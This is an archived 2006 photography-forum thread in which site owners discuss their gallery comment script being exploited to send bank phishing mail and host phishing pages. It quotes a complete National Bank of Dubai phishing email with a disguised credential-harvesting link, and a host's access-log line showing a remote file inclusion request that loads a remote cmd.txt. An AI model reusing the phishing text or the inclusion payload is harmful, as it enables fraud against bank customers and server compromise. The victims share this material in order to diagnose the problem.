PDA

View Full Version : EE hacked for phishing ??


neil_r
8th of June 2006 (Thu), 16:32
I have had my domain suspended as it was delivering phishing e-mails. From the attached file it looks like it was the EE on the site was hacked as the from address on the e-mails was http://www.neil-rice.com/gallery/photo_comment.php. Any advice as to what to do once my domain is restored will be welcome :(

Here is the full e-mail:-

** ENVELOPE RECORDS /var/spool/postfix/deferred/0/0FC9D2CAB3C *** message_size: 2104 308 1 0 message_arrival_time: Thu Jun 8 04:11:38 2006 sender: webmaster@neil-rice.com named_attribute: encoding=8bit named_attribute: client_name=localhost named_attribute: client_address=127.0.0.1 named_attribute: message_origin=localhost[127.0.0.1] named_attribute: helo_name=mcore.webc.lyceu.net named_attribute: protocol_name=ESMTP original_recipient: pkkadermon@zyberway.com recipient: pkkadermon@zyberway.com *** MESSAGE CONTENTS /var/spool/postfix/deferred/0/0FC9D2CAB3C *** Received: from mcore.webc.lyceu.net (localhost [127.0.0.1]) by localhost (Postfix) with ESMTP id 0FC9D2CAB3C for ; Thu, 8 Jun 2006 04:11:38 +0200 (CEST) Received: from wmphpp06.st*****ceu.net (wmphpp06.st*****ceu.net [212.78.206.126]) by mcore.webc.lyceu.net (Postfix) with ESMTP id 49B842CB697 for ; Thu, 8 Jun 2006 04:10:43 +0200 (CEST) Received: by wmphpp06.st*****ceu.net (Postfix, from userid 66855) id 8F25B5B8; Thu, 8 Jun 2006 04:10:43 +0200 (CEST) To: pkkadermon@zyberway.com Subject: You Have An Important Account Message (Urgent) X-WEBC-Mail-Request-IP: 213.255.201.14 X-WEBC-Mail-From-Script: http://www.neil-rice.com/gallery/photo_comment.php From: National Bank of Dubai Reply-To: MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: 8bit Message-Id: <20060608021043.8F25B5B8@wmphpp06.st*****ceu.net> Date: Thu, 8 Jun 2006 04:10:43 +0200 (CEST)
http://www.nationalbank.ae/NBD/NBD_CDA/CDA_Image_Library/NBD_Miscellaneous/home_01.gif
Dear Customer:

Your most recent internet banking security alert update is now available to view online.
To view these latest alert, just click on the link below and logon.
You will be able update to your Internet Banking Service
http://www.nationalbank.ae/NBD/NBD_CDA/update_security/NBOL_check?nbdonline=http://www.nbd.co.ae/nbol (http://www.chncla.com:81/css/auth=DQAAAHEAAADKy8tQv6Kj6MYMtlb5iKZqSJTr-pUTm/--https-nbd.com/nbol/name=nbd/)
Thank you,

National Bank of Dubai.
Internet Banking Customer Service

Please do not reply to this message.
To speak with a representative about your Internet Banking account,
or if you need help about Internet Banking,
call 00-971-4-222 2411 *** HEADER EXTRACTED /var/spool/postfix/deferred/0/0FC9D2CAB3C *** named_attribute: encoding=8bit *** MESSAGE FILE END /var/spool/postfix/deferred/0/0FC9D2CAB3C ***

tmweb
15th of June 2006 (Thu), 22:34
We had the same problem with that phising, but in our case it was http://www.ourdomain.net/ibank.barclays.co.uk/olb/p/LoginMember.do/

and attack seemed to be originated from EE side

mboss
18th of June 2006 (Sun), 14:15
Same here - I just posted a new thread - there seems to be a group of arab hackers out of Saudi Arabia that target banks in the region with phishing attacks. I had a website of arab national bank dumped on my site ...

Darter
20th of June 2006 (Tue), 18:43
My host sent me this today:

Dear Robert Pawlak, (Customer ID: xxx)



It has come to our attention that your web space has been hacked and used to host a phishing site at /mydomain/ibank.barclays.co.uk/:



access.log.current:80.97.92.190 - - [19/Jun/2006:10:16:56 -0400] "POST /gallery/photo_comment.php?toroot=http://

www.geocities.com/xmlsrv/cmd.txt%3f&cmd HTTP/1.1" 200 1358 www.mydomain.com "http://www.mydomain.com/gal lery/photo_comment.php?toroot=http://www.geocities.com/xmlsrv/cmd.txt%3f

&cmd" "Mozilla/4.0 (compatible; MSIE 6.0

; Windows NT 5.1; SV1)" "-"



--



The above was taken from your access logs. It shows that /mydomain/gallery/photo_comment.php was used to perpetrate the hack.

Where mydomain is my website's domain. Looks like they're using the comment generator to make the attack?

Pekka
20th of June 2006 (Tue), 18:45
My host sent me this today:



Where mydomain is my website's domain. Looks like they're using the comment generator to make the attack?

Yes this in known issue: http://photography-on-the.net/forum/showthread.php?t=177875

Darter
21st of June 2006 (Wed), 10:01
Thanks Pekka! I read that but didn't realize it was the same thing. I haven't tested that yet as my host has locked me out for the moment. I'm on the phone right now trying to gain access to fix things.